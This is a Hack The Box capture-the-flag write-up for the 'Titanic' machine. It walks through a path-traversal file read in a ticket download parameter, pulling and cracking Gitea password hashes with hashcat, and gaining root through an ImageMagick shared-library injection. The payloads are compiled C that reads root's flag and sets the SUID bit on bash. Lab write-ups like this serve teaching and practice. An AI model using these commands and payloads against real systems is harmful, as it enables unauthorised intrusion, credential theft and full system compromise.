# Titanic (HTB) ## Enumeration. ### Port Scanning. ``` PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGZG4yHYcDPrtn7U0l+ertBhGBgjIeH9vWnZcmqH0cvmCNvdcDY/ItR3tdB4yMJp0ZTth5itUVtlJJGHRYAZ8Wg= | 256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDT1btWpkcbHWpNEEqICTtbAcQQitzOiPOmc3ZE0A69Z 80/tcp open http syn-ack Apache httpd 2.4.52 |_http-title: Titanic - Book Your Ship Trip | http-methods: |_ Supported Methods: OPTIONS HEAD GET |_http-favicon: Unknown favicon MD5: 79E1E0A79A613646F473CFEDA9E231F1 | http-server-header: | Apache/2.4.52 (Ubuntu) |_ Werkzeug/3.0.3 Python/3.10.12 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ### Enumerate Web. So once we enter the website we see few links and booking functionality.

Once we fill this form we will get JSON file downloaded into our machine containing the information about the ticket.

#### Enumerate directories. Using dirsearch we can find few directories we can test.

We see the book which appear related to that form and download which gives 400 meaning bad request let check it with Burp Suit.

It should take Ticket as GET parameter.

Interesting simple LFI. We get the passwd file and we can see user called Developer. ## SSH as developer. #### Gitea. After i found the user and the LFI i tried looking for configuration files and ssh keys but no luck then using ffuf i was able to find this.

{% hint style="info" %} Gitea is an open-source, self-hosted Git service that's similar to GitHub. It allows developers to manage their Git repositories on their own servers, offering features like issue tracking, pull requests, and project management in a lightweight and easy-to-set-up package. {% endhint %} After a bit of search i found that has a database under the following path `gitea/data/gitea.db`. Let's use CURL to get it. ```purebasic curl http://titanic.htb/download\?ticket\="../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output sql ``` Once we get it we can use sqlite3 to check the database.

Not let's try to crack these. After a bit of search i came across this writeUp. {% embed url="" %} Which explain how to crack gitea passwords as it use pbkdf2-sha algorithm. {% tabs %} {% tab title="Bash" %} ```bash sqlite3 "select passwd,salt,name from user" | while read data; do digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $data | cut -d'|' -f 3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hashes ``` {% endtab %} {% endtabs %} Using this command we can get the hashes as hashcat understand it and then we crack it with hashcat. ```wasm hashcat gitea.hashes ../../Downloads/rockyou.txt --user ``` After a bit we can see this.

Cool now we have valid creds let's SSH.

## Shell as Root. So as for root shell once i get into the machine there a lot of things to look at. {% stepper %} {% step %} ### Enumerate the docker-compose files I have enumerated the docker-compose files one of them was interesting which that allow for ssh on port 2222 i tried to plan ssh key into the /data but no luck {% endstep %} {% step %} ### Check the website running on port 3000 I have enumerated too the website running on port 3000 gitea but nothing actually was there but some commits about the book system./

{% endstep %} {% step %} ### Finally something interesting occur. !!! When i was checking the files around the system i came across this file under /opt/scripts. Which contain some bash script. ```bash cd /opt/app/static/assets/images truncate -s 0 metadata.log find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log ``` At first glance this script seems to fine but !. If we check the version of magick that is running we can find more info about it :).

some google we can find this. {% embed url="" %} Basically the issue is in how the ImageMagick handles the dynamic link libraries allowing for dynamic library injection which allow use to execute any command as privilege as ImageMagick executed. Using this simple Payload inside the image directory where it search for the images. ```c gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF #include #include #include __attribute__((constructor)) void init(){ system("cat /root/root.txt > /tmp/rootflag"); exit(0); } EOF ``` now just change anything in the file to trigger the bash script. ``` cp home.jpg home2.jpg ``` Then just check the tmp to get your flag.

{% endstep %} {% endstepper %} ## Additional info. for the sake of curiosity i wanted to get root shell not just read the flag. Which is an easy task we just need to find a way to allow use to access shell as root. We can change the permissions of the bash executable to include sudo bit which allow us to execute the binary as we are the owners of it. Here is the updated code that do that. ```c gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF #include #include #include __attribute__((constructor)) void init(){ system("chmod 4777 /usr/bin/bash"); exit(0); } EOF ```

But be careful if you just executed it as it is it will not give you root shell.

As we can see we are not root this is because linux by defaults drops the permissions to the normal user for security reasons. We can use -p flag to disable that.